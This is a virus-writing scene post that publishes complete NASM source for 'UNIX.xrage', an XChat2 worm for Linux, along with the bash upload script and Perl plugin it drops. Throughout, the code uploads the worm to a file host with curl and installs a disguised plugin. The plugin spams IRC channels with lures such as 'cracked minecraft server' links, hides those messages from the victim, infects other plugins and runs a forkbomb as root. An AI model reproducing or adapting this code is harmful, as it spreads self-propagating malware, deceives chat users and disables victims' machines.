[+]Topic: Code
[+]By: Perforin
[+]Return: Code
This is my first creation in nASM which uses still some dirty hacks but
with time there comes more skill ;)
UNIX.xrage checks if xchat2 and curl is installed. Then it drops a
Bash script which uploads the worm to netload.in
Now a Perl Plugin is droped to the autoload directory of xchat2. This
Plugin now sends every 5 Minutes a random Message with the netload.in
link to the channel. The victim can't see that he is spreading links
because the plugin uses some Xchat2 API Foo :D
The Plugin checks for other perl plugins in the autoload directory and
infects them.
If the virus is executed as root, the payload is an oldschool forkbomb
You should rly check out the Xchat2 API. It's a heaven for VX :D
Greetings to: SPTH, WarGame, alcopaul,herm1t, zer0p, R3s1stanc3, skier
Greetings to: All the dudes from #virus and #vxnet <3
--> Download <--
; UNIX.xrage 32bit Xchat2 worm
; This is my first creation in nASM which uses still some dirty hacks
; but with time there comes more skill ;)
; UNIX.xrage checks if xchat2 and curl is installed. Then it drops a
; Bash script which uploads the worm to netload.in
; Now a Perl Plugin is droped to the autoload directory of xchat2. This
; Plugin now sends every 5 Minutes a random Message with the netload.in
; link to the channel. The victim can't see that he is spreading links
; because the plugin uses some Xchat2 API Foo :D
; The Plugin checks for other perl plugins in the autoload directory and
; infects them.
; If the virus is executed as root, the payload is an oldschool forkbomb
; You should rly check out the Xchat2 API. It's a heaven for VX :D
; Greetings to: SPTH, WarGame, alcopaul,herm1t, zer0p, R3s1stanc3, skier
; Greetings to: All the dudes from #virus and #vxnet <3
; Coded by Perforin [vxnetw0rk]
section .data
%defstr home %!HOME ; $ENV{'HOME'}
%defstr home_env HOME=%!HOME ; HOME=$ENV{'HOME'}
HOME: db home,0 ; Store $ENV{'HOME'}
HOME_ENV: db home_env,0 ; Store HOME=$ENV{'HOME'}
shell: db "/bin/sh",0 ; our path the the shell
argv: dd shell, script2name, 0 ; argument array for sys_execv
endv: dd HOME_ENV,0 ; environment array for sys_execv
xchat: db "/usr/bin/xchat",0 ; path to xchat
curl: db "/usr/bin/curl",0 ; path to curl
; This is the bash script which will upload the virus to netload.in
script: db '#!/bin/sh',10,'AUTHCODE="jJk7pHDhVKIF2gZ6tRZ8VCpaTWCWaTra"',10
db 'SERVER=`curl -s http://api.netload.in/getserver.php`',10
db 'if [ "x$SERVER" = "x" ]; then',10,'exit 3',10,'fi',10
db 'PARAMETERS="-F auth=$AUTHCODE -F modus=file_upload"',10
db 'PARAMETERS="$PARAMETERS -F file_link=@$1"',10
db 'RESULT=`curl -s $PARAMETERS $SERVER`',10
db 'RESULT_CODE=`echo "$RESULT"|awk -F ',"';' '{print $1}'`",10
db 'RESULT_URL=`echo "$RESULT"|awk -F ',"';' '{print $4}'`",10
db 'if [ "x$RESULT_CODE" = "xprepare_failed" ]; then',10,'exit 6',10
db 'fi',10,'if [ "x$RESULT_CODE" = "xUPLOAD_OK" ]; then',10
db 'echo $RESULT_URL > $HOME/.xchat2/scrollback/url.txt',10,'fi',10
db 'exit 100',10
scriptLEN: equ $-script ; length of the script
scriptname: db 'netload.sh',0 ; captn obvious here
; This is the dirty-work-script. Copys the virus to its destination and destroys itself
script2: db '#!/bin/sh',10,"cp UNIX.xrage $HOME/.xchat2/scrollback/UNIX.xrage",10
db 'rm hackaround_UNIX.xrage.sh',10
script2LEN: equ $-script2 ; length of the script
script2name: db 'hackaround_UNIX.xrage.sh',0 ; captn obvious strikes again!
; This is the actual Xchat2 Perl Plugin which does the spreading
plugin: db '#!/usr/bin/perl',10,"$version = '0.1';",10
db 'Xchat::register("Xchat2 plugin manager", $version,"Responsible for',
db ' loading and initialising Xchat2 plugins");',10
db "$xchatdir_vir = Xchat::get_info('xchatdir');",10
db '$exec_vir = `sh $xchatdir_vir/scrollback/netload.sh $xchatdir_vir/scrollback/UNIX.xrage &`;',10
db '@sentences_vir = ("Hey look at this new cracked minecraft server!",',10
db ' "Newest AIMbot for counterstrike is out now! :D", "This tool is amazing!", "Ok I am honest.',10
db ' I got infected with UNIX.xrage by Perforin [vxnetw0rk]");',10,10
db "Xchat::hook_print('Your Message',\&hideme);",10,"Xchat::hook_timer(300000, \&spread);",10,10
db 'sub hideme {',10,'$msg = $_[0][1];',10,'return Xchat::EAT_XCHAT if $msg =~ /netload.in/i;',10,'}',10
db 'sub spread {',10,'open url, "<", "$xchatdir_vir/scrollback/url.txt" || die "Please reload Xchat!";',10
db 'chomp ($payload_url = );',10,'close url;',10,'$randomize_payload = $sentences_vir[int(rand(4))];',10
db 'Xchat::command("say $randomize_payload $payload_url");',10,'}',10,10
db '@modules_av = glob "$xchatdir_vir/*.pl";',10,'foreach $module_av (@modules_av) {',10
db 'open mod,"<", $module_av;',10,'while () {',10,'$infected = 1 and next if $_ =~ /^\# UNIX.xrage$/;',10
db '}',10,'push @not_infected, $module_av unless $infected;',10,'undef $infected;',10,'close mod;',10,'}',10
db 'foreach $not_infected_yet (@not_infected) {',10,'open mod, ">>", $not_infected_yet;',10
db "print mod 'Xchat::command(",'"load ',"' . $xchatdir_vir . '/xchat_PM.pl",'");',"';",10
db 'print mod "\# UNIX.xrage\n";',10,'close mod;',10,'}',10,'# UNIX.xrage',10
pluginLEN: equ $-plugin ; length of the script
pluginname: db 'xchat_PM.pl',0 ; some lame SE here PM stands for "Plugin Manager"
newname: db 'UNIX.xrage',0 ; part of the payload is that virus renames itself
root_payload: db "Forkbomb bitches! :)",10 ; Those who are dumb enough to start the virus as root
root_payloadLEN: equ $-root_payload ; will see this string
xchat_path: db '.xchat2/scrollback/',0 ; This is the directory which will store our virus
oneless: db '../',0 ; --> cd ..
section .text
global _start
mov eax,5 ; sys_open
mov ebx, xchat ; opening xchat
mov ecx,0 ; O_RDONLY
int 80H ; call the kernel
test eax,eax ; test if xchat exists
js Exit ; no? you lucky bastard!
mov eax,5 ; sys_open
mov ebx, curl ; opening curl
mov ecx,0 ; O_RDONLY
int 80H
test eax,eax ; test if curl exists
js Exit ; no? you lucky bastard!
mov eax, 38 ; sys_rename
mov ebx, [esp+4] ; get the filename of the stack!
mov ecx, newname ; part of the payload :)
int 80H
mov eax,8 ; sys_creat
mov ebx, script2name ; drops "hackaround_UNIX.xrage.sh"
mov ecx,00755Q ; -rwxr-xr-x in octal
int 80H ; File descriptor in eax
test eax,eax ; Is the file descriptor valid?
js Exit ; No? Something went wrong!
mov ebx,eax ; move file descriptor to ebx
mov eax,4 ; sys_write
mov ecx,script2 ; Content of script2
mov edx,script2LEN ; length of script2
int 80H
mov eax, 24 ; sys_getuid
int 80H
cmp eax, 0 ; compare with 0 (0 == root)
je GotRoot ; jmp if eax is equal to 0
ja NotRoot ; jmp if eax is above to 0
mov eax, 4 ; sys_write
mov ebx, 1 ; STDOUT
mov ecx, root_payload ; payload message :)
mov edx, root_payloadLEN
int 80H
mov eax,2 ; sys_fork
jmp GotRoot ; loop
mov eax,2 ; sys_fork
int 80H
test eax,eax
jz Execute ; Child executes script
mov eax, 12 ; sys_chdir
mov ebx, HOME
int 80H
mov eax, 12 ; sys_chdir
mov ebx, xchat_path
int 80H
mov eax,8 ; sys_creat
mov ebx, scriptname
mov ecx,00644Q ; -rw-r--r-- in octal
int 80H ; Call the kernel
; Now we have a file descriptor in eax
test eax,eax ; checking file descriptor...
js Exit ; something went wrong!
mov ebx,eax
mov eax,4 ; sys_write
mov ecx,script ; script content
mov edx,scriptLEN ; length of the script content
int 80H
mov eax, 12 ; sys_chdir
mov ebx, oneless ; cd ../
int 80H
mov eax,8 ; sys_creat
mov ebx, pluginname
mov ecx,00644Q ; -rw-r--r-- in octal
int 80H
test eax,eax ; checking file descriptor...
js Exit ; something went wrong!
mov ebx,eax
mov eax,4 ; sys_write
mov ecx,plugin ; the actual xchat plugin drops now
mov edx,pluginLEN
int 80H
jmp Exit
mov eax, 11 ; sys_execv
mov ebx, shell
mov ecx, argv ; execute our dirty-work-script
mov edx, endv
int 80H
mov eax, 1 ; the end
mov ebx, 0 ; my
int 80H ; friend
The dropped bash script...
SERVER=`curl -s http://api.netload.in/getserver.php`
if [ "x$SERVER" = "x" ]; then
exit 3
PARAMETERS="-F auth=$AUTHCODE -F modus=file_upload"
RESULT_CODE=`echo "$RESULT"|awk -F ';' '{print $1}'`
RESULT_URL=`echo "$RESULT"|awk -F ';' '{print $4}'`
if [ "x$RESULT_CODE" = "xprepare_failed" ]; then
exit 6
if [ "x$RESULT_CODE" = "xUPLOAD_OK" ]; then
echo $RESULT_URL > $HOME/.xchat2/scrollback/url.txt
exit 100
The actual dropped rootkit xchat2 plugin
$version = '0.1';
Xchat::register("Xchat2 plugin manager", $version,"Responsible for loading and initialising Xchat2 plugins");
$xchatdir_vir = Xchat::get_info('xchatdir');
$exec_vir = `sh $xchatdir_vir/scrollback/netload.sh $xchatdir_vir/scrollback/UNIX.xrage &`;
@sentences_vir = ("Hey look at this new cracked minecraft server!", "Newest AIMbot for counterstrike is out now! :D", "This tool is amazing!", "Ok I am honest. I got infected with UNIX.xrage by Perforin [vxnetw0rk]");
Xchat::hook_print('Your Message',\&hideme);
Xchat::hook_timer(300000, \&spread);
sub hideme {
$msg = $_[0][1];
return Xchat::EAT_XCHAT if $msg =~ /netload.in/i;
sub spread {
open url, "<", "$xchatdir_vir/scrollback/url.txt" || die "Please reload Xchat!";
chomp ($payload_url = );
close url;
$randomize_payload = $sentences_vir[int(rand(4))];
Xchat::command("say $randomize_payload $payload_url");
@modules_av = glob "$xchatdir_vir/*.pl";
foreach $module_av (@modules_av) {
open mod,"<", $module_av;
while () {
$infected = 1 and next if $_ =~ /^\# UNIX.xrage$/;
push @not_infected, $module_av unless $infected;
undef $infected;
close mod;
foreach $not_infected_yet (@not_infected) {
open mod, ">>", $not_infected_yet;
print mod 'Xchat::command("load ' . $xchatdir_vir . '/xchat_PM.pl");';
print mod "\# UNIX.xrage\n";
close mod;
# UNIX.xrage